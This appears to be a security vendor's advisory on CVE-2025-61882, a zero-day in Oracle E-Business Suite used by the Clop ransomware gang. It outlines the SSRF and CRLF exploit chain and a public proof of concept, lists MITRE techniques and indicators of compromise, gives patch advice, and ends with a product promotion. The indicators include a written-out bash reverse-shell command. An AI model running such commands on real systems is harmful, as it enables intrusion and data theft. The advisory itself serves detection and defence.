Oracle E-Business Suite (EBS), a comprehensive suite of enterprise resource planning (ERP) applications, is integral to managing core business operations for numerous organizations worldwide. It handles critical functions across finance, HR, and supply chain management.
Recently, a critical zero-day vulnerability, identified as CVE-2025-61882, has been discovered and is being actively exploited by the notorious Clop ransomware gang. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, underscoring the urgency for immediate action due to its use in ransomware campaigns. The flaw holds a critical CVSS score of 9.8 out of 10, reflecting its severe potential for unauthenticated remote code execution (RCE).
Technical Analysis
The root of CVE-2025-61882 lies within the BI Publisher Integration component of Oracle Concurrent Processing. This vulnerability is particularly dangerous because it can be exploited remotely over a network via HTTP without requiring any authentication credentials. An attacker can send a specially crafted request to a vulnerable endpoint to execute arbitrary code on the server, potentially taking complete control of the Oracle Concurrent Processing system.
The attack leverages a chain of at least five distinct bugs to achieve its goal. The sequence begins with a Server-Side Request Forgery (SSRF) attack, followed by a Carriage Return/Line Feed (CRLF) injection to smuggle requests to an exposed EBS application. This allows the attacker to load a malicious XSLT template. The code within this template is executed when the system attempts to preview it, leading to the compromise. While the primary cause is a software flaw, some security experts suggest that the broader campaign also takes advantage of misconfigurations and the abuse of default business logic within Oracle EBS.
Proof of Concept (PoC)
The risk of widespread attacks is significantly amplified by the public release of a Proof-of-Concept exploit. The exploit is available in an archive named ORACLE_EBS_NDAY_EXPLOIT_POC_SCATTERED_LAPSUS_RETARD_CL0P_HUNTERS.zip. This package contains a readme.md file with instructions and two Python scripts: exp.py (the exploit script) and server.py (a listener script).
The exploitation process using this PoC is straightforward:
- Listener Setup: The attacker first runs server.py on their own machine. This script starts a listener on a specified port, waiting for an incoming connection from the compromised server.
- Exploitation: The attacker then executes exp.py, providing the target’s vulnerable Oracle EBS URL as an argument.
- Reverse Shell: The exp.py script sends a malicious HTTP request to the target server, exploiting CVE-2025-61882. If successful, the server executes a command that initiates a reverse shell, connecting back to the attacker’s machine where server.py is listening.
This gives the attacker an interactive command-line interface on the compromised server, allowing them to execute arbitrary commands, exfiltrate data, and deploy further malicious payloads like web shells for persistent access.
Affected Products
The vulnerability impacts Oracle E-Business Suite versions 12.2.3 through 12.2.14.
Tactics, Techniques & Procedures (TTPs)
The Clop gang’s campaign demonstrates a multi-stage attack, leveraging the following tactics and techniques:
| Tactic ID | Tactic Name | Technique ID | Description |
| TA0001 | Initial Access | T1190 | Exploiting a public-facing application to gain an initial foothold. |
| TA0002 | Execution | T1059 | Using command and scripting interpreters to run malicious code. |
| TA0006 | Credential Access | T1555 | Accessing credentials from password stores to move laterally. |
| TA0010 | Exfiltration | T1041 | Stealing data over a Command and Control (C2) channel. |
| TA0040 | Impact | T1485 | Engaging in data destruction as part of their extortion tactics. |
Indicators of Compromise
Organizations can search for the following indicators of compromise (IOCs) to detect potential exploitation:
- IP Addresses:
- 200[.]107[.]207[.]26
- 185[.]181[.]60[.]11
- Command:
- A reverse shell command: sh -c /bin/bash -i >& /dev/tcp// 0>&1
- File Hashes (SHA256):
- 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d (oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip)
- aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 (exp.py)
- 6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b (server.py)
Mitigation & Remediation
Oracle has released an emergency security update to address CVE-2025-61882. CISA has directed Federal Civilian Executive Branch (FCEB) agencies to apply mitigations by October 27, 2025. All organizations using the affected Oracle E-Business Suite versions are strongly urged to apply the necessary patches immediately. As a prerequisite, customers must first install the October 2023 Critical Patch Update before applying the new security fix.
Instantly Fix Risks with Saner Patch Management
Saner patch management is a continuous, automated, and integrated software that instantly fixes risks exploited in the wild. The software supports major operating systems like Windows, Linux, and macOS, as well as 550+ third-party applications.
It also allows you to set up a safe testing area to test patches before deploying them in a primary production environment. Saner patch management additionally supports a patch rollback feature in case of patch failure or a system malfunction.
Experience the fastest and most accurate patching software here.